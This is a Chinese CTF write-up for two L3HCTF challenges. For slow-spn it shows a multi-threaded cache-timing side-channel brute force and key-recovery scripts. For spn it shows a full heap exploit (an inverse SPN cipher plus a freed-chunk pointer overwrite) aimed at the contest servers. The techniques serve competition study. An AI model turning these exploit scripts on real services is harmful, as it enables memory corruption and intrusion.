分类 L3HCTF 下的文章

slow-spn

本题里面cacheLine是一个缓存单元的类型,__maccess()函数负责检查cacheLine是否命中,以及置换掉最少命中次数的cacheLine

思路:侧信道泄露+爆破

/* One slot of the simulated cache that __maccess() checks for hits. */
struct cacheLine
{
  uint32_t tag;       /* address tag; the exploit models it as addr >> 10 (see calc_tag) */
  uint32_t last_used; /* replacement bookkeeping used by __maccess(); exact meaning not shown here */
};
key = flag[0:6]
plain = flag[6:10]
                          k>>n*4
                             ↓
plaintext -> |SS| -> |P| -> XOR -> ... -> |SS| -> |P| -> cipher

... --> |SS| --(vuln)--> |&cache| --> |P| --> ...

getflag的脚本

from pwn import *
from hashlib import sha256
from pwnlib.util.iters import mbruteforce

# Verbose pwntools logging (debug level) so every exchange with the server is visible.
context.log_level = 'debug'
def pow(p):
    """Solve the server's proof-of-work challenge on tube *p*.

    Reads the salt printed between ``hashlib.sha256( x + "`` and the next
    double quote, brute-forces an 8-digit decimal string ``x`` such that
    ``sha256(x + salt).hexdigest()`` starts with ``000000``, and sends it.

    NOTE: the name shadows the builtin ``pow`` inside this script.

    Raises:
        RuntimeError: if ``mbruteforce`` finds no answer.
    """
    p.recvuntil(b"hashlib.sha256( x + \"")
    # bytes delimiter, consistent with the recvuntil above
    c = p.recvuntil(b"\"", drop=True)
    print(c)
    proof = mbruteforce(lambda x: sha256(x.encode() + c).hexdigest()[:6] == '000000',
                        '0123456789', length=8, method='fixed')
    if proof is None:
        # Sending None would crash later with a less obvious error.
        raise RuntimeError("proof-of-work search found no answer")
    p.sendline(proof.encode())
def getflag(key, m):
    """Submit one candidate SPN key and plaintext over the global tube ``p``.

    Args:
        key: candidate key, as the hex string the prompt asks for.
        m: candidate plaintext, as a hex string.

    Returns:
        0 if the server answers ``Wrong.``; otherwise the raw response, which
        is also printed. A successful guess is therefore truthy.
    """
    p.recvuntil(b'Input possible spn key (hex):')
    p.sendline(key)
    p.recvuntil(b'Input possible spn plaintext (hex):')
    p.sendline(m)
    res = p.recv()
    # The reply may carry a trailing newline or whitespace; compare the stripped text.
    if res.strip() == b'Wrong.':
        return 0
    print(res)
    return res


# Connect, pass the proof-of-work, then submit one candidate.
# NOTE(review): '11' / '1111' look like placeholders; substitute the recovered key/plaintext.
p = remote('124.71.173.176' ,8888)
pow(p)
getflag('11' , '1111')

脚本比较乱，这里只贴爆破第一轮的脚本，后面几轮大同小异：

#exp_round1.py
from pwn import *
import sys
from chall import ss_box, p_box, ss_box_addr, p_box_addr
from time import time, sleep
import threading

# `defaultdict` is used below but was never imported explicitly; do not rely on
# `from pwn import *` to re-export it.
from collections import defaultdict

# (cache set index, tag) -> SS-box / P-box values whose table entry lives on that line.
ss_map = defaultdict(list)
p_map = defaultdict(list)
# Set by a worker thread once a probe is fast, so the remaining workers stop early.
stop_flag = False

#context.log_level = "debug"

class MyThread(threading.Thread):
    """``threading.Thread`` that keeps the return value of its target.

    ``func(*args)`` runs in the new thread. Its return value is available via
    :meth:`get_result` once the thread has finished.
    """

    def __init__(self, func, args=()):
        super().__init__()
        self.func = func
        self.args = args
        # Pre-set so get_result() is well defined before run() completes
        # (thread not started yet, or func raised).
        self.result = None

    def run(self):
        self.result = self.func(*self.args)

    def get_result(self):
        """Return func's return value, or None if it has not returned (yet)."""
        return self.result

    def get_args(self, _idx=None):
        """Return the whole args tuple, or ``args[_idx]`` when an index is given."""
        return self.args if _idx is None else self.args[_idx]
            
class MyPipe:
    """Menu-driven connection to the challenge service.

    ``raw_p`` is a pwntools ``process(_addr)`` when ``_typ == "local"``,
    otherwise ``remote(_addr[0], _addr[1])``. Menu options, as used by the
    methods below: 1 = maccess, 2 = conti, 3 = leave, 4 = skip.
    """

    def __init__(self, _addr, _typ="local"):
        self.raw_p = process(_addr) if _typ == "local" else remote(_addr[0], _addr[1])

    def _choose(self, option):
        # Every action starts by answering the main menu prompt.
        self.raw_p.sendlineafter(b"What to do?\n", option)

    def maccess(self, addr, speed):
        """Option 1: access *addr*; *speed* answers the "Speed up?" prompt."""
        print(f"Addr: {addr}")
        cache_set = (addr >> 5) & 0x1F
        tag = addr >> 10
        print(f"Fetch cache: {hex(cache_set)}\nCache tag: {hex(tag)}")
        self._choose(b"1")
        self.raw_p.sendlineafter(b"Where?\n", str(addr).encode())
        self.raw_p.sendlineafter(b"Speed up?\n", str(speed).encode())

    def conti(self):
        """Option 2."""
        self._choose(b"2")

    def leave(self):
        """Option 3."""
        self._choose(b"3")

    def skip(self):
        """Option 4."""
        self._choose(b"4")

    def recv(self, num=2048):
        """Receive up to *num* bytes from the tube."""
        return self.raw_p.recv(num)

    def recvall(self):
        """Receive until the connection closes."""
        return self.raw_p.recvall()

    def close(self):
        self.raw_p.close()
    
def calc_cacheline(addr: int):
    """Return the cache set index of *addr*: address bits 5..9.

    The shift/mask implies 32-byte lines spread over 32 sets.
    """
    offset_bits, set_mask = 5, 0x1F
    return set_mask & (addr >> offset_bits)

def calc_tag(addr: int):
    """Return the cache tag of *addr*: everything above bit 9."""
    tag_shift = 10
    return addr >> tag_shift
    
def map_i(addr):
    """Return the ``(set index, tag)`` pair identifying *addr*'s cache line."""
    set_index = calc_cacheline(addr)
    tag = calc_tag(addr)
    return set_index, tag
    
def gen_target(cache_pos, tag):
    """Build an address that maps to set *cache_pos* with tag *tag* (inverse of map_i)."""
    tag_part = tag * 1024      # tag << 10
    set_part = cache_pos * 32  # cache_pos << 5
    return tag_part + set_part

def ss_box_item(addr):
    """Return the SS-box value stored at *addr* (4-byte entries starting at ss_box_addr)."""
    slot = (addr - ss_box_addr) // 4
    return ss_box[slot]

def p_box_item(addr):
    """Return the P-box value stored at *addr* (4-byte entries starting at p_box_addr)."""
    slot = (addr - p_box_addr) // 4
    return p_box[slot]

def ss_item_addr(value):
    """Return the address of the first SS-box entry equal to *value*."""
    slot = ss_box.index(value)
    return ss_box_addr + 4 * slot

def p_item_addr(value):
    """Return the address of the first P-box entry equal to *value*."""
    slot = p_box.index(value)
    return p_box_addr + 4 * slot

def init():
    """Group SS-box and P-box entries by the cache line their table slot occupies.

    Fills ``ss_map`` / ``p_map`` with ``(set index, tag) -> [box values]`` for
    every 4-byte entry of ``ss_box`` (at ``ss_box_addr``) and ``p_box`` (at
    ``p_box_addr``). Both maps are cleared first, so calling init() again does
    not duplicate entries.
    """
    # The maps are only mutated, never rebound, so no `global` is needed.
    ss_map.clear()
    p_map.clear()
    # Loop names differ from the module-level ss_item_addr()/p_item_addr()
    # helpers so they do not shadow them.
    for entry_addr in range(ss_box_addr, ss_box_addr + len(ss_box) * 4, 4):
        ss_map[map_i(entry_addr)].append(ss_box_item(entry_addr))
    print(f"ss_map size: {hex(len(ss_map))}")
    for entry_addr in range(p_box_addr, p_box_addr + len(p_box) * 4, 4):
        p_map[map_i(entry_addr)].append(p_box_item(entry_addr))
    print(f"p_map size: {hex(len(p_map))}")

# Module-level round-1 results; burp_round_1 appends its matches to p1_list and s1_matched.
s1_list, p1_list, s1_matched = [], [], []

def _timed_probe(p, addr):
    """Warm *addr*'s cache line, resume execution, and time the next reply.

    Sends a sped-up ``maccess`` for *addr* followed by ``conti`` on pipe *p*,
    and returns the seconds until the first reply byte arrives.
    """
    p.maccess(addr, 1)  # speed up
    p.conti()
    t1 = time()
    p.recv(1)
    return time() - t1


def burp_round_1(server=("124.71.173.176", 9999)):
    """Recover round-1 SS-box / P-box candidates through the cache-timing channel.

    Phase 1 starts one thread per ``(set, tag)`` key of ``ss_map``. Each thread
    opens a fresh connection to *server*, warms the line holding the first
    SS-box value of that key, and times the round. The first reply faster than
    ``SS_HIT_THRESHOLD`` stops the search, and that key's values become the s1
    candidates.

    Phase 2 takes each candidate ``s1``, sends ``skip``, and probes the cache
    line of the P-box entry ``p_box[s1]``. Fast replies are appended to the
    module-level ``p1_list`` / ``s1_matched``.

    Args:
        server: ``(host, port)`` of the challenge service.
    """
    MAX_THREAD = 0x100
    # Empirically tuned cut-offs in seconds: below -> hit, at or above -> miss.
    SS_HIT_THRESHOLD = 0.95
    P_HIT_THRESHOLD = 0.96
    global stop_flag
    stop_flag = False

    def check_si_fetch(p: MyPipe, cache_info):
        global stop_flag
        if stop_flag:
            p.close()
            return False
        try:
            elapsed = _timed_probe(p, ss_item_addr(ss_map[cache_info][0]))
        finally:
            # Close even if recv() raised, so connections are not leaked.
            p.close()
        if elapsed >= SS_HIT_THRESHOLD:
            return False
        stop_flag = True
        return True

    pool = []
    init_active = threading.active_count()
    for cache_info in ss_map:
        # Wait for a free slot *before* connecting, so no connection sits idle
        # while the pool is full, and none is opened once a hit has been found.
        while threading.active_count() - init_active > MAX_THREAD:
            sleep(0.8)
        if stop_flag:
            break
        th = MyThread(func=check_si_fetch, args=(MyPipe(server, "remote"), cache_info))
        th.daemon = True  # Thread.setDaemon() is deprecated since Python 3.10
        th.start()
        pool.append(th)

    # Initialised up front so the prints below work even when no probe hits.
    # NOTE: s1_list is a local name here; the module-level s1_list is untouched.
    s1_cache_info = None
    s1_list = []
    for th in pool:
        th.join()
        if th.get_result():
            s1_cache_info = th.get_args(1)
            s1_list = ss_map[s1_cache_info]
            break
    print(f"s1_cache_info: {s1_cache_info}")
    print(f"s1_list: {s1_list}")
    if s1_cache_info is None:
        print("No SS-box cache line produced a fast reply.")
        return

    for s1 in s1_list:
        p = MyPipe(server, "remote")
        try:
            p.skip()
            target = p_item_addr(p_box[s1])
            elapsed = _timed_probe(p, target)
            if elapsed >= P_HIT_THRESHOLD:
                print("Miss")
            else:
                p1_cache_info = map_i(target)
                print(f"Got p1 cache info: {p1_cache_info}")
                p1_list.append(p_box[s1])
                s1_matched.append(s1)
        finally:
            p.close()
    print(f"p1_list: {p1_list}")
    print(f"s1_matched: {s1_matched}")

def exp():
    """Build the cache-line maps, then run the round-1 side-channel brute force."""
    init()
    burp_round_1()

# Script entry point.
if __name__ == "__main__":
    exp()

第四组不需要在远程爆破完；本地调试时把线程开多一些，完整爆破一遍验证即可。

[remote]

round 1:
p1_list: [24177, 24160, 24176, 20336]
s1_matched: [20075, 20072, 20074, 20070]

round 2:
p2_list: [29651, 29634]
s2_matched: [10975, 10972]

round 3:
p3_list: [51619, 55459, 51635]
s3_matched: [59445, 59449, 59447]

然后根据上面的结果计算 mlist 和 klist：

# Hits collected by the remote brute force, rounds 1-3.
p1_list = [24177, 24160, 24176, 20336]
s1_matched = [20075, 20072, 20074, 20070]
p2_list = [29651, 29634]
s2_matched = [10975, 10972]
p3_list = [51619, 55459, 51635]  # kept for reference; not used below
s3_matched = [59445, 59449, 59447]

# SS-box inputs of the round-1 hits, as 4-digit hex strings. Per the diagram,
# round 1 applies SS directly to the plaintext, so these are plaintext candidates.
mlist = [format(ss_box.index(v), "04x") for v in s1_matched]

# SS input of round n+1 = (P output of round n) XOR round key, so XOR-ing the
# two recovers round-key candidates. Index lookups are done once per value.
s2_inputs = [ss_box.index(s) for s in s2_matched]
k1list = [p ^ s_in for s_in in s2_inputs for p in p1_list]
s3_inputs = [ss_box.index(s) for s in s3_matched]
k2list = [p ^ s_in for s_in in s3_inputs for p in p2_list]

# Consecutive round keys overlap: the low 12 bits of k1 must equal the high
# 12 bits of k2. Stitch each compatible pair into one longer key candidate.
klist = [(k1 << 4) + (k2 & 0xf)
         for k1 in k1list
         for k2 in k2list
         if (k1 & 0xfff) == (k2 >> 4)]

print(mlist)
# klist was computed but never shown.
print(klist)

spn

# S-box and 1-based bit permutation of the target SPN, used by re_s()/re_p().
sbox = [0xE, 0x4, 0xD, 0x1, 0x2, 0xF, 0xB, 0x8, 0x3, 0xA, 0x6, 0xC, 0x5, 0x9, 0x0, 0x7]
pbox = [1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15, 4, 8, 12, 16]
# Single-bit masks from MSB to LSB of a 16-bit word (not used by the functions here).
masks = [0x8000 >> shift for shift in range(16)]
# Five 16-bit round keys. Each is the previous one slid by one nibble along 0x3a94d63f.
key = [0x3A94, 0xA94D, 0x94D6, 0x4D63, 0xD63F]
def re_s(c):
    """Apply the inverse S-box to each of the four low nibbles of *c*."""
    out = 0
    for shift in (0, 4, 8, 12):
        nibble = (c >> shift) & 0xF
        out += sbox.index(nibble) << shift
    return out
def re_p(c):
    """Permute the bits of the 16-bit word *c* with ``pbox``.

    Bit ``i`` (counted from the MSB) moves to position ``pbox[i] - 1``. The
    pbox in this file is its own inverse, so this also undoes the P layer.
    """
    out = 0
    for src in range(16):
        if not c & (0x8000 >> src):
            continue
        out |= 0x8000 >> (pbox[src] - 1)
    return out

def dec(m):
    """Decrypt one 2-byte block *m*, read as a little-endian 16-bit word.

    Undoes the SPN layer by layer:
    1. XOR off ``key[-1]``.
    2. Three times: inverse S-box, XOR the next round key (``key[-2]``,
       ``key[-3]``, ``key[-4]``), then inverse permutation.
    3. Finish with the inverse S-box and ``key[0]``.
    """
    state = m[0] | (m[1] << 8)
    state ^= key[-1]
    for round_key in (key[-2], key[-3], key[-4]):
        state = re_p(re_s(state) ^ round_key)
    state = re_s(state) ^ key[0]
    low, high = state & 0xff, state >> 8
    return bytes((low, high))
def decrypt(m):
    """Decrypt *m* two bytes at a time with dec(); ``len(m)`` must be even."""
    assert len(m) % 2 == 0
    return b"".join(dec(m[i:i + 2]) for i in range(0, len(m), 2))

# Quick check: decrypt an 8-byte sample (four 2-byte blocks).
print(decrypt(b'4N4N4N4N'))

过 spn 的脚本：调用 decrypt(想要写入内存的内容)，然后把返回值发给远程即可。
传入的数据长度必须是 2 的倍数（SPN 按 2 字节分组处理）；否则远程会把最后一组缺少的字节当作 \x00 或其他不确定的值。为避免出错，建议始终使用 2 的倍数的长度。

由于 decrypt 算出来的值写到远程后不太稳定，改成两次 edit：第一次把写入结果与预期不一致的分组收集进 nonaddlist，第二次再正常打。

from pwn import *

#p = process("./SPN_ENC", env = {"LD_PRELOAD": "./libc-2.27.so"})
#p = process("./SPN_ENC")
# Remote target; the commented-out process(...) lines above are the local alternatives.
p = remote("124.71.194.126", 9999)
# Verbose pwntools logging, including the "w:" lines checked in exp().
context.log_level = "debug"

# S-box and 1-based bit permutation of the target SPN, used by re_s()/re_p().
sbox = [0xE, 0x4, 0xD, 0x1, 0x2, 0xF, 0xB, 0x8, 0x3, 0xA, 0x6, 0xC, 0x5, 0x9, 0x0, 0x7]
pbox = [1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15, 4, 8, 12, 16]
# Single-bit masks from MSB to LSB of a 16-bit word (not used by the functions here).
masks = [0x8000 >> shift for shift in range(16)]
# Five 16-bit round keys. Each is the previous one slid by one nibble along 0x3a94d63f.
key = [0x3A94, 0xA94D, 0x94D6, 0x4D63, 0xD63F]
# Plaintext 2-byte blocks whose decrypted high byte dec() bumps by one; filled by exp().
nonaddlist = []

def re_s(c):
    """Inverse S-box on the four low nibbles of *c*, reassembled in place."""
    nibbles = [(c >> (4 * pos)) & 0xF for pos in range(4)]
    return sum(sbox.index(n) << (4 * pos) for pos, n in enumerate(nibbles))
def re_p(c):
    """Move bit ``i`` (from the MSB) of *c* to position ``pbox[i] - 1``.

    With this file's pbox the permutation is self-inverse, so this undoes the P layer.
    """
    result, i = 0, 0
    while i < 16:
        if c & (0x8000 >> i):
            result |= 0x8000 >> (pbox[i] - 1)
        i += 1
    return result

def dec(m):
    """Decrypt one 2-byte block *m*, read as a little-endian 16-bit word.

    Same inverse SPN as the plain version. In addition, blocks listed in
    ``nonaddlist`` (collected by exp()'s first edit) get the high byte of
    their output incremented by one, modulo 256.
    """
    addnum = 1 if m in nonaddlist else 0
    m = (m[1] << 8) | m[0]
    m ^= key[-1]
    for i in range(3):
        m = re_s(m)
        m ^= key[-(i + 2)]
        m = re_p(m)
    m = re_s(m)
    m ^= key[0]
    # Wrap the corrected high byte: 0xff + 1 would be 256, which bytes() rejects
    # with ValueError.
    return bytes([m & 0xff, ((m >> 8) + addnum) & 0xff])
def decrypt(m):
    """Split *m* into 2-byte blocks and decrypt each with dec(); ``len(m)`` must be even."""
    assert len(m) % 2 == 0
    blocks = [m[off:off + 2] for off in range(0, len(m), 2)]
    return b"".join(map(dec, blocks))

def _menu(option):
    """Answer the main menu (whose prompt ends with "0.exit") with *option*."""
    p.sendlineafter(b"0.exit\n", option)


def _send_index(idx):
    """Answer the "Index:" prompt with *idx*."""
    p.sendlineafter(b"Index:\n", str(idx).encode())


def malloc(size, idx):
    """Menu 1: request *size* bytes into slot *idx*."""
    _menu(b"1")
    p.sendlineafter(b"Size:\n", str(size).encode())
    _send_index(idx)


def edit(index, size, content):
    """Menu 2: declare *size*, then send *content* raw (no trailing newline) to slot *index*."""
    _menu(b"2")
    _send_index(index)
    p.sendlineafter(b"Size\n", str(size).encode())
    p.sendafter(b"Content\n", content)


def free(idx):
    """Menu 3 on slot *idx*."""
    _menu(b"3")
    _send_index(idx)


def show(idx):
    """Menu 4 on slot *idx*."""
    _menu(b"4")
    _send_index(idx)

#: 0x555555554000

def exp():
    """Run the heap exploit against the global tube ``p``.

    1. Read the "gift" address (elf_base = gift - 0x2040E0).
    2. malloc slot 0 (0x40) and slots 1-3 (0x20), then free slots 3, 2, 1.
    3. Edit slot 0 with 0x40 filler + p64(0) + p64(0x31) + p64(gift). This
       overwrites the header and first qword of the chunk after slot 0;
       presumably the freed slot-1 chunk's tcache next pointer (libc 2.27,
       per the commented-out LD_PRELOAD). Confirm before relying on it.
       The data is passed through decrypt() first. The first edit records,
       from the ``w:`` lines, which 2-byte blocks came out different, into
       ``nonaddlist``. The second edit re-decrypts with that correction.
    4. malloc slots 5 and 6 (0x20), then write b"A"*8 through slot 6.
    """
    p.recvuntil(b"gift:")
    gift = int(p.recvuntil(b"\n", drop=True).decode(), 16)
    elf_base = gift - 0x2040E0
    print("gift:", hex(gift))
    print("elf_base:", hex(elf_base))

    # malloc
    malloc(0x40, 0)
    for i in range(3):
        malloc(0x20, i + 1)
    free(3)
    free(2)
    free(1)
    payload = b"A" * 0x40 + p64(0) + p64(0x31) + p64(gift)
    payload_dec = decrypt(payload)
    # Hex form computed once instead of on every loop iteration below.
    dec_hex = payload_dec.hex()
    print("Payload len:", hex(len(payload)))
    print(payload.hex())
    print(dec_hex)
    # Write the whole payload (0x58 bytes); decrypt() preserves the length.
    w_size = len(payload_dec)
    edit(0, w_size, payload_dec)
    # One "w:" line is expected per 2-byte block, i.e. per 4 hex digits.
    for i in range(0, w_size * 2, 4):
        p.recvuntil(b"w:")
        # Block with its two bytes swapped (high byte first), to match the server's output.
        tar = dec_hex[i + 2:i + 4] + dec_hex[i:i + 2]
        act = p.recvuntil(b"\n", drop=True).decode().rjust(4, "0")
        print(tar, act)
        if tar != act:
            # Record the *plaintext* block; dec() adjusts it on the second pass.
            nonaddlist.append(payload[i // 2:i // 2 + 2])
    print(nonaddlist)
    edit(0, w_size, decrypt(payload))

    # fetch
    malloc(0x20, 5)
    malloc(0x20, 6)
    edit(6, 8, b"A" * 8)
    print("gift:", hex(gift))
    p.sendline(b"5")

    p.interactive()

# Script entry point: run the exploit.
if __name__ == "__main__":
    exp()